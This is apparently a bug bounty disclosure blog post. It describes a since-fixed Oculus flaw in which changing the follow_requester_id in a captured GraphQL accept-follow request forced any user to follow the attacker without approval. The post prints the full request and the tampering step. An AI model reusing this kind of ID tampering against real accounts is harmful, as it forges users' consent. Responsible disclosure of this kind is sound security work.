Meta Quest: Attacker could make any Oculus user to follow (subscribe) him without any approval

Description

Attacker was able to subscribe any Oculus user on attacker's Oculus account without user approval. So it was possible to make very attractive account with a lot of real followers without their approval:). This followers are displayed in Oculus Quest device when you open user profile, also in profile opened in Meta Quest for Android and some other places.

Bug details

 This page https://secure.oculus.com/my/people/  displays Oculus user followers:

 


If user (attacker) has enabled confirmation for follow requests, than everytime when somebody wants to follow him, user should confirm this action (see screenshot).

When user press "confirm" the next request is executed:

POST /graphql?locale=en_US HTTP/2
Host: graph.oculus.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://secure.oculus.com/
Content-Type: application/x-www-form-urlencoded
X-Fb-Friendly-Name: OCAccountFollowRequestButtonsAcceptMutation
Content-Length: 1149
Origin: https://secure.oculus.com
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers
access_token=[oculus_token]&__user=0&__a=1&__dyn=7xxxxxxx&__csr=&__req=b&__hs=19319.BP%3ADEFAULT.2.0.0.0.0&dpr=1&__ccg=UNKNOWN&__rev=1006635818&__s=0r9wew%3Ahv568o%3A8ypvmx&__hsi=7169288311854648182&__comet_req=0&fb_dtsg=NAcPG2AAd4G6m4szOMQvjzA16I2JKXs2PpV0Zpo9_y87xy-YjAtUBXQ%3A25%3A1669198279&jazoest=25286&lsd=9-B9N5_yEmkNxprj42tPAh&__jssesw=1&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=OCAccountFollowRequestButtonsAcceptMutation&variables=%7B%22follow_requester_id%22%3A%22109035146728215%22%2C%22add_connections%22%3A%5B%22client%3A10487732912XXXX%3A__OCAccountFollowerList_followers_connection(orderby%3A%5C%22NAME_OR_ALIAS%5C%22)%22%5D%2C%22remove_connections%22%3A%5B%22client%3A10487732912XXXX%3A__OCAccountFollowRequestList_follower_requests_received_connection(orderby%3A%5C%22NAME_OR_ALIAS%5C%22)%22%5D%7D&server_timestamps=true&doc_id=5253592544678660


Where "follow_requester_id%22%3A%22109035146728YYY" represents parameter with Oculus ID who wants to follow user (your account). Now replace "109035146728YYY" on any other valid "XXXXX" Oculus ID and execute this request.

User "XXXXX" will be subscribed on your account (will follow you without any approvals from "XXXXX" side).

Timeline

23.11.2022: me: bug submited like issue found in People for Oculus Quest device app (I did't knew http request for this, but it worked via People app bug)

23.11.2022: me: found vulnerable request via https://secure.oculus.com/my/people/ page and have submited more details

24.11.2022: fb: triaged

26.11.2022: fb: reward $863 (750 + 113 bonus)

26.11.2022: me: asked to explain reward amount 

30.11.2022: me: payment dispute

07.12.2022: fb: fixed

14.12.2022: fb: additional reward $863 (750 + 113 bonus) - total reward $1500 + $226 bonus

however I expected that this issue will have more impact than it was rewarded:), but ok.

Popular posts from this blog

React debug.keystore key was trusted by Meta(Facebook) which caused to Instagram account takeover by malicious apps.

Facebook Messenger server random memory exposure through corrupted GIF image

Facebook Messenger for MacOS contained valid hardcoded FB access token (employee's token?)